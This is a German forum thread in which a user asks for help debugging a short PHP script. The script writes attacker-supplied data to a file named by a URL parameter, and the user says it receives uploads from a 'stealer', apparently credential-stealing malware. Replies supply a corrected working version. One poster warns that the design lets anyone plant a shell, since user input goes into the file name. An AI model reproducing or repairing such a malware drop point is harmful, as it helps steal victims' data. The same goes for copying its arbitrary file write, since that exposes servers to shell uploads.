Hallo, Ich Habe Folgenden Code.


<?php
$file = $_GET['file'];
$daten = $_GET['daten'];
file_put_contents($file,$daten)
?>

Blos wenn ich ihn so aufrufe kommt dort Warning: file_put_contents() [function.file-put-contents (http://boterkidd.t35.com/function.file-put-contents)]: Filename cannot be empty in /home/freehost/t35.com/b/o/blahblahblah/send.php on line 4

woran liegt es??

Free Web Hosting - Reliable Free Hosting - cPanel Hosting - T35 Hosting (http://www.t35.com/) Hier hoste ich es

Erstmal fehlt hinter file_put_contents n semikolon
2. musst du checken ob GET gesetzt ist.

Fixxed:


<?php
if($_GET['file'] && $_GET['daten']) {
$file = $_GET['file'];
$daten = $_GET['daten'];
}
else {
exit;
}
file_put_contents($file,$daten);
?>

Das File wird ja vom stealer erstellt und hochgeladen

Dann musst du es downloaden und ändern, und wieder uploaden ;)

Ich werds einfach per ftp Upload oder Email oder MYSQL Machen Danke für deine Hilfe.

Sollte die Zeile "
file_put_contents($file,$daten);" nicht lieber in die IF-Verzweigung.. wäre irgendwie sinnvoller? ^^

Aufgrund des exit im else kann das file_put_contents auch drunter stehen ;)
Ich persönlich würd das exit weglassen und die Funktion ins if schreiben.

Und ich persönlich würde aufhören Shell-Upload-Scripts zu programmieren.
Aber gut... manche Leute haben wohl gern eine Shell auf dem Webspace...
(wer den Fehler nicht erkennt, dem sei das selbe gesagt, was ich auch schon Code-C4 vor nicht allzu kurzer Zeit gesagt habe: Userinput gehört verdammtnochmal nicht in Dateinamen!)